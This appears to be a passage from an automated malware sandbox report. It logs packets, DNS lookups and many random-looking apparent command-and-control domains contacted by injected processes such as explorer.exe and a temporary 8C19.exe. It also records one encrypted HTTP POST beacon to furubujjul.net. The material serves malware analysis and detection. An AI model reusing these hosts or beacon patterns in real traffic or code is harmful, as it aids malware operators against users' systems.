                                                                                                                                  Oct 17, 2022 22:07:24.862261057 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.862298965 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.862324953 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.862325907 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.862364054 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.862879992 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.862880945 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.863154888 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.863212109 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.863240004 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.863256931 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.863269091 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.863306999 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.863367081 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.863367081 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.863399982 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.863903046 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.863972902 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.864011049 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.864042997 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.864069939 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.864104986 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.864135027 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.865014076 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.865061045 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.865077972 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.865113974 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.865140915 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.865294933 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.868288040 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.872533083 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.967964888 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:25.282048941 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:25.282495975 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:25.309186935 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.309432983 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.398344994 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.482798100 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:25.482798100 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:25.510116100 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.510152102 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.517146111 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:25.517184019 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.517251968 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:25.517263889 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.543095112 CEST4971780192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:25.572449923 CEST4972280192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:25.596513033 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.645279884 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:25.655810118 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:25.655889034 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:25.683141947 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.683178902 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.685235977 CEST804971745.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.685394049 CEST4971780192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:25.712594032 CEST804972245.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.712856054 CEST4972280192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:25.731281042 CEST4972280192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:25.771318913 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.815968037 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:25.818156958 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:25.818192005 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:25.845539093 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.845598936 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.871551991 CEST804972245.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.894103050 CEST804972245.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.931803942 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.936383963 CEST4972280192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:25.936460972 CEST4972280192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:25.943859100 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:25.943900108 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:25.971048117 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.971093893 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:26.058640003 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:26.076611996 CEST804972245.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:26.084053040 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:26.084134102 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:26.108078957 CEST804972245.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:26.111362934 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:26.111471891 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:26.200664997 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:26.328629971 CEST4972280192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:26.333921909 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:26.911628008 CEST4972280192.168.2.545.136.151.102
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Oct 17, 2022 22:06:27.866137028 CEST5695353192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:06:27.890122890 CEST53569538.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:34.090620995 CEST5928753192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:06:34.107852936 CEST53592878.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:59.379132032 CEST5864853192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:06:59.397810936 CEST53586488.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:03.213567972 CEST6189353192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:03.235198021 CEST53618938.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:05.740963936 CEST6064953192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:05.758786917 CEST53606498.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:09.127866030 CEST5144153192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:09.148441076 CEST53514418.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:10.788518906 CEST4917753192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:11.111504078 CEST53491778.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.171720028 CEST4972453192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:11.191490889 CEST53497248.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.497402906 CEST6145253192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:12.519588947 CEST53614528.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:16.358562946 CEST6532353192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:16.378303051 CEST53653238.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:20.105532885 CEST5148453192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:20.124440908 CEST53514848.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:20.468209982 CEST6344653192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:20.732976913 CEST53634468.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:21.377001047 CEST5675153192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:21.532216072 CEST53567518.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:21.719316959 CEST5503953192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:21.738986015 CEST53550398.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.384155035 CEST6097553192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:22.401000023 CEST53609758.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:23.429269075 CEST5922053192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:23.451821089 CEST53592208.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:23.593379974 CEST5506853192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:23.611151934 CEST53550688.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.338704109 CEST5668253192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:24.357665062 CEST53566828.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.766866922 CEST5853253192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:24.788784981 CEST53585328.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.926420927 CEST6265953192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:24.945591927 CEST53626598.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:25.553950071 CEST5626353192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:25.571472883 CEST53562638.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:26.229567051 CEST6551353192.168.2.58.8.8.8
                                                                                                                                  Oct 17, 2022 22:07:26.247221947 CEST53655138.8.8.8192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:26.484612942 CEST5668753192.168.2.58.8.8.8
                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                  Oct 17, 2022 22:06:27.866137028 CEST192.168.2.58.8.8.80xd108Standard query (0)furubujjul.netA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:06:34.090620995 CEST192.168.2.58.8.8.80xc2e5Standard query (0)pelegisr.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:06:59.379132032 CEST192.168.2.58.8.8.80x28e5Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:03.213567972 CEST192.168.2.58.8.8.80xa082Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:05.740963936 CEST192.168.2.58.8.8.80x3417Standard query (0)aaa.apiaaaeg.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:09.127866030 CEST192.168.2.58.8.8.80xdf87Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:10.788518906 CEST192.168.2.58.8.8.80xcdccStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:11.171720028 CEST192.168.2.58.8.8.80x2801Standard query (0)aaa.apiaaaeg.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:12.497402906 CEST192.168.2.58.8.8.80x667aStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:16.358562946 CEST192.168.2.58.8.8.80xd3b7Standard query (0)dldsystem.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:20.105532885 CEST192.168.2.58.8.8.80x1ffeStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:20.468209982 CEST192.168.2.58.8.8.80x5b73Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:21.377001047 CEST192.168.2.58.8.8.80x1dfbStandard query (0)dldsystem.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:21.719316959 CEST192.168.2.58.8.8.80xb708Standard query (0)aaa.apiaaaeg.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:22.384155035 CEST192.168.2.58.8.8.80xa6a4Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:23.429269075 CEST192.168.2.58.8.8.80x33bcStandard query (0)jamesmillion.xyzA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:23.593379974 CEST192.168.2.58.8.8.80x895dStandard query (0)aaa.apiaaaeg.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.338704109 CEST192.168.2.58.8.8.80xfed5Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.766866922 CEST192.168.2.58.8.8.80xf405Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.926420927 CEST192.168.2.58.8.8.80x467fStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:25.553950071 CEST192.168.2.58.8.8.80xeddStandard query (0)aaa.apiaaaeg.comA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:26.229567051 CEST192.168.2.58.8.8.80x517aStandard query (0)1drv.msA (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:26.484612942 CEST192.168.2.58.8.8.80xf7b7Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Oct 17, 2022 22:06:27.890122890 CEST8.8.8.8192.168.2.50xd108No error (0)furubujjul.net104.21.93.30A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:06:27.890122890 CEST8.8.8.8192.168.2.50xd108No error (0)furubujjul.net172.67.203.213A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:06:34.107852936 CEST8.8.8.8192.168.2.50xc2e5No error (0)pelegisr.com185.220.204.62A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:06:59.397810936 CEST8.8.8.8192.168.2.50x28e5No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:06:59.397810936 CEST8.8.8.8192.168.2.50x28e5No error (0)star-mini.c10r.facebook.com157.240.20.35A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:03.235198021 CEST8.8.8.8192.168.2.50xa082No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:05.758786917 CEST8.8.8.8192.168.2.50x3417No error (0)aaa.apiaaaeg.com45.136.151.102A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:09.148441076 CEST8.8.8.8192.168.2.50xdf87No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:09.148441076 CEST8.8.8.8192.168.2.50xdf87No error (0)star-mini.c10r.facebook.com31.13.92.36A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:11.111504078 CEST8.8.8.8192.168.2.50xcdccNo error (0)avtlsgosecure.com34.91.216.49A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:11.191490889 CEST8.8.8.8192.168.2.50x2801No error (0)aaa.apiaaaeg.com45.136.151.102A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:12.519588947 CEST8.8.8.8192.168.2.50x667aNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:16.378303051 CEST8.8.8.8192.168.2.50xd3b7No error (0)dldsystem.com162.144.15.231A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:20.124440908 CEST8.8.8.8192.168.2.50x1ffeNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:20.124440908 CEST8.8.8.8192.168.2.50x1ffeNo error (0)star-mini.c10r.facebook.com31.13.92.36A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:20.732976913 CEST8.8.8.8192.168.2.50x5b73No error (0)avtlsgosecure.com34.91.216.49A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:21.532216072 CEST8.8.8.8192.168.2.50x1dfbNo error (0)dldsystem.com162.144.15.231A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:21.738986015 CEST8.8.8.8192.168.2.50xb708No error (0)aaa.apiaaaeg.com45.136.151.102A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:22.401000023 CEST8.8.8.8192.168.2.50xa6a4No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:22.401000023 CEST8.8.8.8192.168.2.50xa6a4No error (0)star-mini.c10r.facebook.com157.240.20.35A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:23.451821089 CEST8.8.8.8192.168.2.50x33bcNo error (0)jamesmillion.xyz104.192.2.242A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:23.611151934 CEST8.8.8.8192.168.2.50x895dNo error (0)aaa.apiaaaeg.com45.136.151.102A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.357665062 CEST8.8.8.8192.168.2.50xfed5No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.357665062 CEST8.8.8.8192.168.2.50xfed5No error (0)star-mini.c10r.facebook.com31.13.92.36A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.788784981 CEST8.8.8.8192.168.2.50xf405No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.945591927 CEST8.8.8.8192.168.2.50x467fNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.945591927 CEST8.8.8.8192.168.2.50x467fNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.945591927 CEST8.8.8.8192.168.2.50x467fNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:24.945591927 CEST8.8.8.8192.168.2.50x467fNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:25.571472883 CEST8.8.8.8192.168.2.50xeddNo error (0)aaa.apiaaaeg.com45.136.151.102A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:26.247221947 CEST8.8.8.8192.168.2.50x517aNo error (0)1drv.ms13.107.42.12A (IP address)IN (0x0001)false
                                                                                                                                  Oct 17, 2022 22:07:26.503609896 CEST8.8.8.8192.168.2.50xf7b7No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  • pelegisr.com
                                                                                                                                  • www.facebook.com
                                                                                                                                  • api.2ip.ua
                                                                                                                                  • github.com
                                                                                                                                  • dldsystem.com
                                                                                                                                  • hmedenoe.org
                                                                                                                                    • furubujjul.net
                                                                                                                                  • ariymxinp.net
                                                                                                                                  • okrenbrpq.com
                                                                                                                                  • gvuhujihq.net
                                                                                                                                  • pyqxykfbyx.net
                                                                                                                                  • egupm.com
                                                                                                                                  • ypsqcei.com
                                                                                                                                  • 185.174.137.174
                                                                                                                                  • gayxc.net
                                                                                                                                  • jnwjh.org
                                                                                                                                  • kqnukffkf.org
                                                                                                                                  • njomtuqes.net
                                                                                                                                  • bcubynupij.com
                                                                                                                                  • xeebbali.org
                                                                                                                                  • ygjlvm.com
                                                                                                                                  • pdviimuy.net
                                                                                                                                  • aaa.apiaaaeg.com
                                                                                                                                  • xqxsaedljj.com
                                                                                                                                    • avtlsgosecure.com
                                                                                                                                  • rpnkx.org
                                                                                                                                  • clcjalto.org
                                                                                                                                  • grafs.net
                                                                                                                                  • dhlyfpb.net
                                                                                                                                  • gnnnraawcb.org
                                                                                                                                  • mkheots.net
                                                                                                                                  • pakvlb.com
                                                                                                                                  • nyftrqq.org
                                                                                                                                  • avqnngwqw.com
                                                                                                                                  • tkavdryu.org
                                                                                                                                  • ewgonaqm.com
                                                                                                                                  • yuvwvqgqwb.com
                                                                                                                                  • tekxbw.com
                                                                                                                                  • vwbkimlhg.com
                                                                                                                                  • ksedxblf.org
                                                                                                                                  • bvenxtm.net
                                                                                                                                  • wxsohsstcq.net
                                                                                                                                  • yclscqegh.org
                                                                                                                                  • dcxytihxr.com
                                                                                                                                  • btqtaywr.org
                                                                                                                                  • xixace.org
                                                                                                                                  • umtcicl.org
                                                                                                                                  • bfdgvxgb.net
                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  0192.168.2.549694185.220.204.62443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  1192.168.2.549695157.240.20.35443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  10192.168.2.549712162.144.15.231443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  11192.168.2.549714157.240.20.35443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  12192.168.2.549715157.240.20.35443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  13192.168.2.54971831.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  14192.168.2.54971931.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  15192.168.2.549692104.21.93.3080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:06:27.929771900 CEST18OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://hmedenoe.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 180
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:27.929794073 CEST18OUTData Raw: 48 9d 89 cd 3c 6e 22 52 2a 77 53 25 7c af 53 cd 5b 18 ef 1a fb 1c dd ac b5 6e a4 f2 07 f6 d3 96 fe ae 8a c2 72 32 e3 b5 a5 2c 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 97 a9 2e b0
                                                                                                                                  Data Ascii: H<n"R*wS%|S[nr2,jp_S61oJf=B!bO.m:GlpRQI'mNEm.g[SaZN@=-g5bA
                                                                                                                                  Oct 17, 2022 22:06:28.109186888 CEST20INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:28 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7oALrIoAwhuoYZT%2FCbtR4LGHLUyRcnMhyng2odjyW3I1mQ2IExUezOq3VBgGDyEZAJ4IYG8DPAaOnJFnR9%2FqOqtQysIm9wQBNEQdv5MrRQjKadOdoSF%2BAbWG35g9A9Dwsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7a89b2606d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
